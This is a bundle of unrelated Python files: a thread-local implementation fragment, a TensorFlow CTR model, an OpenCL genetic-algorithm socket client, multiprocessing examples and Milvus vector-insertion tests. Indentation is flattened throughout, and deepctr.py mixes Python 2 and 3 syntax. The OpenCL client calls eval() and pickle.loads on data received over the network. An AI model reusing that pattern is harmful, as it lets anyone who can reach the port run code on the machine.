AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
# Threading import is at end
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
        if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
currentThread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = currentThread().__dict__.get(key)
if d is None:
d = {}
currentThread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__():
threading_enumerate = enumerate
__getattribute__ = object.__getattribute__
def __del__(self):
key = __getattribute__(self, '_local__key')
try:
threads = list(threading_enumerate())
except:
# if enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
return __del__
__del__ = __del__()
from threading import currentThread, enumerate, RLock
|
deepctr.py
|
import multiprocessing
import tensorflow as tf
import tef
import tef.ops
import tef.training
batch_queue = multiprocessing.Queue(maxsize=5000)
def load_data():
global batch_queue
with open("data.txt") as fp:
for line in fp.readlines():
columns = line.split(",")
assert len(columns) == 6
kv = {}
for i in range(len(columns)):
column = columns[i].strip()
items = column.split(":")
assert len(items) == 2
key = items[0]
values = items[1].split("|")
assert len(values) > 0
for k in range(len(values)):
values[k] = int(values[k])
if key == "interest" or key == "ad_kw":
while len(values) < 5:
values.append(0)
kv[key] = values
            print(kv)
batch_queue.put((kv["uid"][0], kv["age"][0], kv["interest"], kv["aid"][0], kv["ad_kw"], kv["label"]))
def data_generator():
global batch_queue
while True:
yield batch_queue.get()
def data_from_feed():
data_set = tf.data.Dataset.from_generator(data_generator, (tf.int64, tf.int64, tf.int64, tf.int64, tf.int64, tf.float32))
#data_set = data_set.padded_batch(4, padded_shapes=[None])
data_set = data_set.batch(5)
iterator = tf.compat.v1.data.make_one_shot_iterator(data_set)
return iterator.get_next()
def full_connect(name, input, input_dim, output_dim):
w = tef.ops.variable("%s_w_%dx%d" % (name, input_dim, output_dim), [input_dim, output_dim], tf.float32)
b = tef.ops.variable("%s_b_%d" % (name, output_dim), [output_dim], tf.float32)
return tf.sigmoid(tf.matmul(input, w) + b)
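# Convert a dense tensor into a tf.SparseTensor, dropping entries equal to
# `missing_element` (used here for the 0-padded "interest" and "ad_kw" fields).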
def dense_to_sparse(dense, missing_element):
indices = tf.where(tf.not_equal(dense, missing_element))
values = tf.gather_nd(dense, indices)
shape = tf.shape(dense, out_type=tf.int64)
return tf.SparseTensor(indices, values, shape)
def deep_ctr():
graph = tf.Graph()
with graph.as_default():
uid, age, interest, aid, ad_kw, label = data_from_feed()
embs = []
uid_emb = tef.ops.embedding(uid, "uid", [20], tf.float32, id_type="hash")
embs.append(uid_emb)
age_emb = tef.ops.embedding(age, "age", [120, 20], tf.float32, id_type="index")
embs.append(age_emb)
sp_interest = dense_to_sparse(interest, 0)
interest_emb = tef.ops.embedding_sparse(sp_interest,
"interest",
[20],
tf.float32,
id_type="hash",
combiner="mean")
embs.append(interest_emb)
aid_emb = tef.ops.embedding(aid, "aid", [20], tf.float32, id_type="hash")
embs.append(aid_emb)
sp_ad_kw = dense_to_sparse(ad_kw, 0)
ad_kw_emb = tef.ops.embedding_sparse(sp_ad_kw,
"ad_kw",
[20],
tf.float32,
id_type="hash",
combiner="mean")
embs.append(ad_kw_emb)
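# Five 20-dim embeddings (uid, age, interest, aid, ad_kw) are concatenated,
# which is why the first dense layer below takes a 5 * 20 = 100-dim input.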
x = tf.concat(embs, axis=1)
x = full_connect("fc_1", x, 5 * 20, 100)
x = full_connect("fc_2", x, 100, 100)
y = full_connect("fc_3", x, 100, 1)
# NOTE: full_connect already applies a sigmoid to y, while
# sigmoid_cross_entropy_with_logits expects raw logits; ideally the last
# layer would skip the activation.
loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=label, logits=y)
loss_mean = tf.reduce_mean(loss)
sgd_optimizer = tef.training.GradientDescentOptimizer(0.002)
gs, stubs = sgd_optimizer.compute_gradients(loss)
train_op = sgd_optimizer.apply_gradients(gs, stubs)
sess = tf.compat.v1.Session(graph = graph)
batch = 0
while batch < 10:
loss_value, _ = sess.run([loss_mean, train_op])
print "batch=%d, loss=%f" % (batch, loss_value)
batch += 1
if __name__ == '__main__':
data_load_process = multiprocessing.Process(target=load_data)
data_load_process.daemon = True
data_load_process.start()
deep_ctr()
|
ocl_ga_client.py
|
#!/usr/bin/python3
import traceback
import argparse
import pickle
import pyopencl as cl
from pyopencl import device_info as di
import random
import tempfile
import time
import uuid
from multiprocessing import Process, Pipe, Value, Event
from .ocl_ga import OpenCLGA
from .utilities.generaltaskthread import Logger
from .utilities.socketserverclient import Client, OP_MSG_BEGIN, OP_MSG_END
oclClient = None
## Query the list of platforms and the list of devices for a specific platform.
def query_devices(c_p):
import pyopencl as cl
platforms = cl.get_platforms()
data = []
for pidx in range(len(platforms)):
devices = platforms[pidx].get_devices()
for didx in range(len(devices)):
data.append((pidx, didx))
c_p.send(data)
## OpenCLGAWorker is a spawned process which is supposed to run OpenCLGA on a
# target device which is decided by OpenCLGAClient.
# @param platform_index Platform index which is queried and assigned by Client.
# @param device_index Device index which is queried and assigned by Client.
# @param ip The IP of server.
# @param port The listening port of server.
# @var exit_evt An event waited on in run(); it is set when an 'exit'
#      command is received, or when the worker is terminated.
# @var uuid A unique ID for the UI to identify the worker.
# @var running A variable shared by the client & worker process to indicate
#      whether the worker is running or not.
class OpenCLGAWorker(Process, Logger):
def __init__(self, platform_index, device_index, ip, port):
Process.__init__(self)
Logger.__init__(self)
# self.logger_level ^= Logger.MSG_VERBOSE
self.daemon = True
self.exit_evt = Event()
self.running = Value('i', 0)
self.platform_index = platform_index
self.device_index = device_index
self.ip = ip
self.port = port
self.uuid = uuid.uuid1().hex
self.ocl_ga = None
## Terminate the worker process. This should only be called when OpenCLGAClient
# is shutting down. The exit_evt will be set to break the wait in the
# process's run().
def terminate(self):
self.exit_evt.set()
while self.running.value:
time.sleep(0.1)
super(OpenCLGAWorker, self).terminate()
## The actual execution place in worker process.
# First, mark the process as running.
# Second, create opencl context according to the platform, device indices.
# Third, create a socket client as the communication channel to server.
def run(self):
self.running.value = 1
random.seed()
try:
self.__create_context()
self.info('Worker created for context {}'.format(self.device.name))
self.info('Worker [{0}] connect to server {1}:{2}'.format(
self.device.name, self.ip, self.port))
except:
self.error('Create OpenCL context failed !')
return
try:
self.client = Client(self.ip, self.port, { 'pre' : OP_MSG_BEGIN,
'post': OP_MSG_END,
'callback' : self._process_data })
self.__notify_client_online(self.client.get_address())
self.info('Worker [{0}] wait for commands'.format(self.device.name))
# If client is terminated by ctrl+c, exception will be caught in
# worker process.
self.exit_evt.wait()
except ConnectionRefusedError:
self.error('Connection refused! Please check Server status.')
self.client = None
except KeyboardInterrupt:
pass
finally:
self.__shutdown()
## Create opencl context according to specific information.
def __create_context(self):
self.platform = cl.get_platforms()[self.platform_index]
assert self.platform is not None
self.device = self.platform.get_devices()[self.device_index]
assert self.device is not None
self.dev_type = self.device.get_info(di.TYPE)
self.context = cl.Context(devices=[self.device])
return self.context
## Send the per-generation results back to the server and dump them to the log.
def __send_and_dump_info(self, index, data):
assert self.ocl_ga is not None
self.verbose('{0}\t\t==> {1} ~ {2} ~ {3}'.format(index, data['best'], data['avg'],
data['worst']))
self.__send({'type' : 'generationResult',
'data' : { 'worker' : self.uuid,
'result' : { 'best_fitness' : data['best'],
'avg_fitness' : data['avg'],
'worst_fitness': data['worst'],
'best_result' : data['best_result'] }}})
## The callback function for OpenCLGA to notify state changes.
def _state_changed(self, state):
self.__send({'type' : 'stateChanged',
'data' : { 'worker' : self.uuid,
'state' : state}})
## Create OpenCLGA instance with options
# @param options Algorithm setup information
def __create_ocl_ga(self, options):
options['cl_context'] = self.context
options['generation_callback'] = self.__send_and_dump_info
self.ocl_ga = OpenCLGA(options,
action_callbacks={ 'state' : self._state_changed })
self.ocl_ga.prepare()
self.info('Worker [{}]: oclGA prepared'.format(self.device.name))
## Receive raw data from server and take actions accordingly.
# @param data A string-like bytearray object which can be converted to
# dictionary. Two keys should be included. 1) 'command' 2) 'data'
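#        e.g. (illustrative only) b"{'command': 'pause', 'data': None}"
#        would pause a previously prepared OpenCLGA instance.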
def _process_data(self, data):
msg = str(data, 'ASCII')
dict_msg = eval(msg)
cmd = dict_msg['command']
payload = dict_msg['data']
self.verbose('Worker [{}]: cmd received = {}'.format(self.device.name, cmd))
if cmd in ['pause', 'stop', 'restore', 'best', 'save', 'statistics', 'elites'] and not self.ocl_ga:
self.error('Cmd "{}" will only be processed if ocl_ga exists '.format(cmd))
return
try:
if cmd == 'prepare':
self.__create_ocl_ga(pickle.loads(payload))
elif cmd == 'pause':
self.ocl_ga.pause()
elif cmd == 'stop':
self.ocl_ga.stop()
elif cmd == 'restore':
self.ocl_ga.restore(payload)
elif cmd == 'save':
# NOTE : Need to think about this ... too large !
# state_file = tempfile.NamedTemporaryFile(delete=False)
self.ocl_ga.save(payload)
# saved_filename = state_file.name
# with open(state_file.name, 'rb') as fd:
self.__send({'type': 'save',
'result': None})
# state_file.close()
elif cmd == 'best':
chromesome_kernel, best_fitness, best_chromosome = self.ocl_ga.get_the_best()
self.__send({'type': 'best',
'data': { 'worker': self.uuid,
'result': pickle.dumps(best_chromosome),
'kernel_result': repr(chromesome_kernel) }})
elif cmd == 'statistics':
self.__send({'type': 'statistics',
'result': self.ocl_ga.get_statistics()})
elif cmd == 'run':
prob_mutate, prob_cross = payload
self.info('Worker [{}]: oclGA run with {}/{}'.format(self.device.name,
prob_mutate, prob_cross))
self.ocl_ga.run(prob_mutate, prob_cross)
elif cmd == 'elites':
self.ocl_ga.update_elites(pickle.loads(payload))
elif cmd == 'exit':
self.exit_evt.set()
else:
self.error('unknown command {}'.format(cmd))
except:
traceback.print_exc()
## Send data back to server
# @param data The msg to be sent.
def __send(self, data):
if self.client:
self.client.send(repr(data))
## Called when the process is terminated or receives 'exit' command from
# server.
# Need to notify UI that the worker is lost and then socket client
# will be closed here.
def __shutdown(self):
self.info('Worker [{0}] is exiting ...'.format(self.device.name))
try:
if self.ocl_ga:
self.ocl_ga.stop()
self.ocl_ga = None
self.__notify_client_offline()
except:
print('[OpenCLGAClient] Exception while notifying server ...')
try:
# NOTE : Make sure all messages are sent from the client, so that the UI
# can receive the notification that the client went offline.
while not self.client.is_message_sent():
time.sleep(0.1)
except:
pass
if self.client:
try:
self.client.shutdown()
except:
print('[OpenCLGAClient] Exception while shutting down client socket ...')
self.client = None
self.running.value = 0
## Notify UI that client is connected.
def __notify_client_online(self, client_ip):
self.__send({'type' : 'workerConnected',
'data' : { 'type' : cl.device_type.to_string(self.dev_type),
'platform' : self.platform.name,
'name' : self.device.name,
'ip' : client_ip,
'worker' : self.uuid}})
## Notify UI that client is lost.
def __notify_client_offline(self):
self.__send({'type' : 'workerLost',
'data' : { 'worker' : self.uuid}})
## OpenCLGAClient is supposed to create as many worker processes as possible:
# one worker per device, summed over all platforms on the machine.
# e.g. if there are 2 devices for platform 1 and 1 device for platform 2,
# 3 worker processes will be created in total.
# Since the computing power may vary among devices, OpenCLGAClient keeps
# running only while all of its workers are still alive.
class OpenCLGAClient(Logger):
def __init__(self, ip, port):
Logger.__init__(self)
self.server_ip = ip
self.server_port = port
self.__workerProcesses = []
self.__create_workers_for_devices()
## Start all worker processes, and setup a while-loop to monitor the status
# of each worker.
# The loop is broken when the workers are no longer all alive (either 1. they
# have done their jobs or 2. they were shut down by the OpenCLGAServer 'exit'
# command), or when a KeyboardInterrupt happens.
def run_forever(self):
try:
self.__start_workers()
while True:
if not self.__is_alive():
self.info('[OpenCLGAClient] All workers are NOT alive, ByeBye !!')
break
time.sleep(0.01)
except KeyboardInterrupt:
self.info('[OpenCLGAClient] KeyboardInterrupt, ByeBye !!')
## Stop all workers, and clean up variables.
def shutdown(self):
self.__stop_workers()
self.__workerProcesses = []
## This is a workaround for Mac Intel Drivers. We will get an error:
# pyopencl.cffi_cl.LogicError: clGetContextInfo failed: INVALID_CONTEXT
# if we try to use get_devices() in this process. So, we create an extra
# process to read all platforms and devices. After that, we can create
# device and command queue without this error.
def __create_workers_for_devices(self):
p_p, c_p = Pipe()
p = Process(target=query_devices, args=(c_p,))
p.start()
device_list = p_p.recv()
p.join()
for dev in device_list:
self.__create_process(dev[0], dev[1])
## Create an OpenCLGAWorker process for the given platform and device.
# @param platform_index The index of platform
# @param device_index The index of device for certain platform.
def __create_process(self, platform_index, device_index):
process = OpenCLGAWorker(platform_index,
device_index,
self.server_ip,
self.server_port)
self.__workerProcesses.append(process)
## Start all worker processes
def __start_workers(self):
for worker in self.__workerProcesses:
worker.start()
## Terminate all worker processes
def __stop_workers(self):
for worker in self.__workerProcesses:
self.verbose('stop_workers ... {} is alive {}'.format(worker, worker.is_alive()))
if worker.is_alive():
worker.terminate()
self.info('process {} is terminated.'.format(worker))
## OpenCLGAClient is only alive when all workers are alive.
def __is_alive(self):
alive = True
for worker in self.__workerProcesses:
alive = alive and worker.is_alive()
return alive
## Start up a standalone OpenCLGAClient. It will be closed when all worker
# processes are dead, or when a KeyboardInterrupt (Ctrl+c) is received.
# @param server The IP of OpenCLGAServer.
# @param port The port which is listened by OpenCLGAServer
def start_ocl_ga_client(server, port):
global oclClient
assert oclClient is None
logger = Logger()
oclClient = OpenCLGAClient(server, port)
try:
oclClient.run_forever()
finally:
oclClient.shutdown()
oclClient = None
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='OpenCLGA client help')
parser.add_argument('server', metavar='ip', type=str, nargs='?',
help='the server ip, default : 127.0.0.1', default='127.0.0.1')
parser.add_argument('port', metavar='port', type=int, nargs='?',
help='the server port, default : 12345', default=12345)
args = parser.parse_args()
start_ocl_ga_client(args.server, args.port)
|
context_and_start_methods_01_spawn_01.py
|
import multiprocessing as mp
import os
def processes_info() -> None:
print(f'\nprocess id \t\t-> {os.getpid()}')
print(f'\nparent process id \t-> {os.getppid()}')
def target_function() -> None:
processes_info()
if __name__ == '__main__':
# set_start_method() should not be used more than once in the program.
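# Alternatively, mp.get_context('spawn') returns a context object with the
# same API, without changing the global (process-wide) default start method.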
mp.set_start_method(method='spawn') # new clean process
process = mp.Process(name='spawn process', target=target_function)
process.start()
process.join()
print(f'\n{process.name} joined')
|
script_run_bg.py
|
# Snippet
import threading
# Run a script function in a separate thread
def run_bg(target_func, args):
t = threading.Thread(target=target_func, args=args)
t.start()
# End snippet
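# Example usage (illustrative; `work` is a made-up function, and note that
# run_bg does not return the Thread, so the caller cannot join it):
#
#     def work(n):
#         print('working on', n)
#     run_bg(work, (42,))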
|
test_add_vectors.py
|
import time
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
collection_id = "test_add"
ADD_TIMEOUT = 60
tag = "1970-01-01"
add_interval_time = 1.5
nb = 6000
class TestAddBase:
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_add_vector_create_collection(self, connect, collection):
'''
target: test add vector, then create collection again
method: add vector and create collection
expected: status not ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
param = {'collection_name': collection,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert not status.OK()
def test_add_vector_has_collection(self, connect, collection):
'''
target: test add vector, then check collection existence
method: add vector and call Hascollection
expected: collection exists, status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert assert_has_collection(connect, collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector(self, connect, collection):
'''
target: test add vector after collection deleted
method: delete collection and add vector
expected: status not ok
'''
status = connect.drop_collection(collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_add_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after collection_2 deleted
method: delete collection_2 and add vector to collection_1
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.drop_collection(collection)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_drop_collection(self, connect, collection):
'''
target: test delete collection after add vector
method: add vector and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.drop_collection(collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_delete_another_collection(self, connect, collection):
'''
target: test delete collection_1 after add vector to collection_2
method: add vector and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_drop_collection(self, connect, collection):
'''
target: test delete collection after add vector for a while
method: add vector, sleep, and delete collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
connect.flush([collection])
status = connect.drop_collection(collection)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_delete_another_collection(self, connect, collection):
'''
target: test delete collection_1 after add vector to collection_2 for a while
method: add vector , sleep, and delete collection
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector(self, connect, collection, get_simple_index):
'''
target: test add vector after build index
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_add_vector_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_index(collection, index_type, index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.drop_collection(param['collection_name'])
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index(self, connect, collection, get_simple_index):
'''
target: test build index after adding vector
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(index_param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_create_index_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index(self, connect, collection, get_simple_index):
'''
target: test build index after adding vector for a while
method: add vector and build index
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test add vector to collection_2 after build index for collection_1 for a while
method: build index and add vector
expected: status ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status = connect.create_index(param['collection_name'], index_type, index_param)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector(self, connect, collection):
'''
target: test add vector after search collection
method: search collection and add vector
expected: status ok
'''
vector = gen_single_vector(dim)
status, result = connect.search_vectors(collection, 1, vector)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_add_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, result = connect.search_vectors(collection, 1, vector)
status, ids = connect.add_vectors(param['collection_name'], vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector(self, connect, collection):
'''
target: test search vector after add vector
method: add vector and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
assert status.OK()
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_search_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 after search collection_2
method: search collection and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector(self, connect, collection):
'''
target: test search vector after add vector after a while
method: add vector, sleep, and search collection
expected: status ok
'''
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status, result = connect.search_vectors(collection, 1, vector)
assert status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vector_sleep_search_vector_another(self, connect, collection):
'''
target: test add vector to collection_1 a while after searching collection_2
method: search collection, sleep, and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(collection, vector)
connect.flush([collection])
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids(self, connect, collection):
'''
target: test add vectors in collection, use customize ids
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors, ids)
connect.flush([collection])
assert status.OK()
assert len(ids) == nq
status, result = connect.search_vectors(collection, top_k, query_records=vectors)
logging.getLogger().info(result)
assert len(result) == nq
for i in range(nq):
assert result[i][0].id == i
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_ids_no_ids(self, connect, collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use customize ids first, and then use no ids
expected: status not OK
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors, ids)
assert status.OK()
status, ids = connect.add_vectors(collection, vectors)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_not_ids_ids(self, connect, collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use not ids first, and then use customize ids
expected: status not OK
'''
nq = 5; top_k = 1;
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
status, ids = connect.add_vectors(collection, vectors, ids)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids_length_not_match(self, connect, collection):
'''
target: test add vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
ids = [i for i in range(1, nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(collection, vectors, ids)
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def get_vector_id(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_ids_invalid(self, connect, collection, get_vector_id):
'''
target: test add vectors in collection, use customize ids, which are not int64
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
vector_id = get_vector_id
ids = [vector_id for _ in range(nq)]
with pytest.raises(Exception):
connect.add_vectors(collection, vectors, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, with the partition_tag param
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_A(self, connect, collection):
'''
target: test add vectors in collection created before
method: create partition and add vectors in it
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_not_existed(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, with the not existed partition_tag param
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_not_existed_A(self, connect, collection):
'''
target: test add vectors in collection created before
method: create partition, add vectors with the not existed partition_tag param
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, dim)
new_tag = "new_tag"
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=new_tag)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_tag_existed(self, connect, collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it repeatedly, with the partition_tag param
expected: the collection row count equals to nq
'''
nq = 5
vectors = gen_vectors(nq, dim)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
for i in range(5):
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
assert status.OK()
assert len(ids) == nq
@pytest.mark.level(2)
def test_add_vectors_without_connect(self, dis_connect, collection):
'''
